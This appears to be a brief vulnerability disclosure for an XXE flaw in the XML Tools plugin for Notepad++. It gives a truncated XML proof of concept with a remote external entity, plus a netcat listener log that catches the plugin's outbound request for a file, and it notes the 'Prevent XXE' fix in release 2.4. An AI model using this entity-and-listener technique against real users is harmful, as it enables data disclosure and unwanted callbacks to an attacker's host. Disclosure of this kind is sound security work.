XML tools for notepad++ have XXE vulnerability.
Where we install XML tools plugin on notepad++ and where he want to check XML files, for example
%remote;]>
<users>
<user>BC48F6077761C9197752A3990A2B396F</user>
<root>
</root></users>
XML tools send request to 188.187..:4444 and wait where hi download 1.xml file
root@vps-1062110:~# nc -l -vv -p 4444
listening on [any] 4444 ...
Warning: forward host lookup failed for dynamicip-188-187--.pppoe.volgograd.ertelecom.ru: Unknown host
connect to [109.120.--.--] from dynamicip-188-187--.pppoe.volgograd.ertelecom.ru [188.187..] 32805
GET /1.xml HTTP/1.0
Host: 109.120.--.--:4444
Accept-Encoding: gzip
The release 2.4 of XMLTools adds a "Prevent XXE" mode which should solve the problem.